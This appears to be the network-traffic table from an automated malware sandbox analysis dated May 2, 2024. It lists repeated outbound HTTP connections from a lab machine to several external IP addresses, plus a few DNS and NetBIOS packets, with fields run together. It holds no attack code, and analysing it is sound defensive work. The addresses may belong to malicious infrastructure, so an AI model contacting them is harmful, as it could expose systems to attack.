                                                                                            May 2, 2024 08:28:21.419140100 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503128052 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503161907 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503180027 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503211021 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503254890 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503264904 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.503299952 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503334045 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.503359079 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503427982 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.503511906 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503526926 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503653049 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:22.613553047 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.627830982 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.783396006 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.784087896 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.793699026 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.949213028 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.986429930 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.986607075 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.987026930 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.987026930 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:24.142529011 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:32.044791937 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.322665930 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:32.322730064 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.325015068 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.604260921 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:32.604337931 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.882160902 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182195902 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182224035 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182275057 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.182297945 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182352066 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182384968 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.182432890 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182449102 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182483912 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.183585882 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.183603048 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.183644056 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.829627037 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:34.849589109 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.127321005 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.127388954 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.127638102 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.405409098 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684334993 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684401035 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684448004 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.684550047 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684637070 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684652090 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684669018 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684669018 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.684701920 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.686428070 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.686443090 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.686477900 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:37.396697044 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:38.421503067 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:38.718143940 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:38.718277931 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:38.723397017 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.020237923 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.020271063 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.020313978 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.317635059 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.597989082 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598010063 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598062038 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.598072052 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598154068 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598165989 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598189116 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598203897 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.598491907 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598534107 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.598562956 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598606110 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:40.225678921 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.239900112 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.519207001 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:41.519541979 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.519541979 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.798891068 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:42.050122976 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:42.050144911 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:42.050339937 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:42.050339937 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:42.329355955 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:47.181792021 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.335211992 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.335294008 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.335522890 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.488799095 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.488821030 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.488858938 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.642158031 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.827896118 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.827924013 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.827981949 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:48.928070068 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.465487957 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.618884087 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.618962049 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.619167089 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.773029089 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.909734964 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.909780979 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.909838915 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:58.121702909 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.149621010 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.304112911 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.305978060 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.305978060 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.460000038 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.463784933 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.618105888 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.758326054 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.758363962 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.758550882 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:00.817698002 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:01.833782911 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:01.990781069 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:01.993967056 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:01.993967056 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.152143955 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288319111 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288368940 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288388968 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288446903 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.288479090 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288520098 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.288544893 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288574934 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288610935 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.288691044 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288784981 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288846970 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.288888931 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288908005 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288974047 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.445311069 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445375919 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445394039 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445461035 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.445468903 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445512056 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.445621014 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445638895 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445703030 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.445749044 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445774078 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445831060 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.445940971 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.445983887 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446044922 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.446108103 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446120977 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446187019 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.446253061 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446352005 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446409941 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.446504116 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446530104 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.446590900 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.446664095 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.604403973 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:08.749598026 CEST4919080192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:08.842361927 CEST8049190154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:08.842432022 CEST4919080192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:08.842675924 CEST4919080192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:08.935482979 CEST8049190154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:08.935570002 CEST4919080192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:09.028353930 CEST8049190154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:09.161247969 CEST8049190154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:09.161328077 CEST8049190154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:09.161385059 CEST4919080192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:10.349292040 CEST4919080192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:11.363435030 CEST4919180192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:11.456641912 CEST8049191154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:11.456764936 CEST4919180192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:11.456959963 CEST4919180192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:11.549875021 CEST8049191154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:11.683789968 CEST8049191154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:11.683813095 CEST8049191154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:11.683908939 CEST4919180192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:12.970102072 CEST4919180192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:13.987768888 CEST4919280192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:14.080678940 CEST8049192154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:14.084063053 CEST4919280192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:14.084063053 CEST4919280192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:14.177232027 CEST8049192154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:14.177433968 CEST4919280192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:14.270864964 CEST8049192154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:14.407983065 CEST8049192154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:14.408013105 CEST8049192154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:14.408056974 CEST4919280192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:15.590946913 CEST4919280192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:16.605066061 CEST4919380192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:16.698024988 CEST8049193154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:16.698154926 CEST4919380192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:16.698314905 CEST4919380192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:16.791327000 CEST8049193154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:16.926501989 CEST8049193154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:16.926553965 CEST8049193154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:16.926573992 CEST8049193154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:16.926815033 CEST4919380192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:16.927637100 CEST4919380192.168.2.22154.41.250.58
                                                                                            May 2, 2024 08:29:17.023092031 CEST8049193154.41.250.58192.168.2.22
                                                                                            May 2, 2024 08:29:27.636225939 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:27.911636114 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:27.912066936 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:27.912276983 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:28.187249899 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.187283039 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.189863920 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:28.465154886 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776334047 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776361942 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776386023 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776432037 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:28.776540995 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776592016 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:28.776597977 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776669979 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.776722908 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:28.777450085 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.777481079 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.777529955 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:28.784166098 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.784192085 CEST8049194183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:28.784238100 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:29.412523031 CEST4919480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:30.426666975 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:30.726042986 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:30.726105928 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:30.726321936 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:31.026052952 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296595097 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296606064 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296611071 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296770096 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296777964 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296792984 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:31.296869993 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.296964884 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:31.297812939 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.297836065 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.299715042 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:31.299808025 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.299817085 CEST8049195183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:31.303673983 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:32.236144066 CEST4919580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:33.251626968 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:33.529488087 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:33.535666943 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:33.535666943 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:33.813087940 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:33.813100100 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:33.813353062 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:34.090754986 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.090766907 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374264002 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374315023 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374361992 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:34.374469995 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374577045 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374623060 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:34.374650955 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374814034 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.374850988 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:34.375437975 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.375592947 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.375636101 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:34.379626989 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.379844904 CEST8049196183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:34.379894018 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:35.044128895 CEST4919680192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:36.089607000 CEST4919780192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:36.365108013 CEST8049197183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:36.365158081 CEST4919780192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:36.365324974 CEST4919780192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:36.643007994 CEST8049197183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:36.928196907 CEST8049197183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:36.928217888 CEST8049197183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:36.928317070 CEST4919780192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:36.928416014 CEST4919780192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:29:37.204648972 CEST8049197183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:29:50.478945971 CEST4919880192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:50.568530083 CEST8049198208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:50.568864107 CEST4919880192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:50.568864107 CEST4919880192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:50.658834934 CEST8049198208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:53.093537092 CEST4919980192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:53.182034016 CEST8049199208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:53.182133913 CEST4919980192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:53.182307005 CEST4919980192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:53.270648003 CEST8049199208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:55.698779106 CEST4920080192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:55.787667990 CEST8049200208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:55.787724972 CEST4920080192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:55.788033962 CEST4920080192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:55.878062963 CEST8049200208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.304008007 CEST4920180192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:58.393235922 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.393846989 CEST4920180192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:58.393846989 CEST4920180192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:58.483205080 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.718971968 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.719037056 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.719116926 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.719260931 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.719274044 CEST8049201208.91.197.13192.168.2.22
                                                                                            May 2, 2024 08:29:58.719633102 CEST4920180192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:58.720963001 CEST4920180192.168.2.22208.91.197.13
                                                                                            May 2, 2024 08:29:58.809761047 CEST8049201208.91.197.13192.168.2.22

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            May 2, 2024 08:26:04.055118084 CEST138138192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:26:08.124651909 CEST5456253192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:26:08.222877026 CEST53545628.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:26:51.505460024 CEST5291753192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:26:51.608325005 CEST53529178.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:26:56.611654997 CEST6275153192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:26:56.775614023 CEST53627518.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:01.625319958 CEST5789353192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:27:01.725507021 CEST53578938.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:27:04.484443903 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:05.237036943 CEST137137192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:27:06.001429081 CEST137137192.168.2.22192.168.2.255
